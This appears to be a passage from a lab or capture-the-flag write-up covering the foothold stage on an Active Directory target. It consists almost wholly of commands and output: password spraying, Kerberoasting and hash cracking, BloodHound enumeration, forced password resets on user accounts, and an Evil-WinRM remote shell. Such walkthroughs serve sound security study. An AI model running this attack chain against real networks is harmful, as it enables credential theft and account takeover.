Foothold
Last updated
Last updated
nagoya-industries.comMatthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.LewisVerify usernames
fiona.clark:Summer2023svc_helpdesk
svc_mssql
svc_tpl
svc_web❯ hashcat -m 13100 kereroast.hash ~/rockyou.txt -O --show
...
svc_mssql:Service1
...svc_mssql:Service1svc_web:Service1❯ bloodhound-python -d nagoya-industries.com -u fiona.clark -p Summer2023 -ns 192.168.246.21 -c all
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: nagoya-industries.com
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (nagoya.nagoya-industries.com:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 36 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: nagoya.nagoya-industries.com
INFO: Done in 00M 08S
❯ python targetedKerberoast.py -v -d nagoya-industries.com -u fiona.clark -p Summer2023❯ hashcat -m 13100 targeted.hash ~/rockyou.txt -OCouldnt crack anything. Change password instead
❯ net rpc password "Bethan.Webster" 'Pwned123!' -U nagoya-industries.com/fiona.clark%Summer2023 -S dc.nagoya-industries.com❯ net rpc password "Christopher.Lewis" 'Pwned123!' -U nagoya-industries.com/Bethan.Webster%'Pwned123!' -S dc.nagoya-industries.com❯ evil-winrm -i 192.168.246.21 -u Christopher.Lewis -p Pwned123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami ; type C:\local.txt ; ipconfig
nagoya-ind\christopher.lewis
fe51542372fe3fdfb29cae954902c311
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.246.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.246.254
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents>
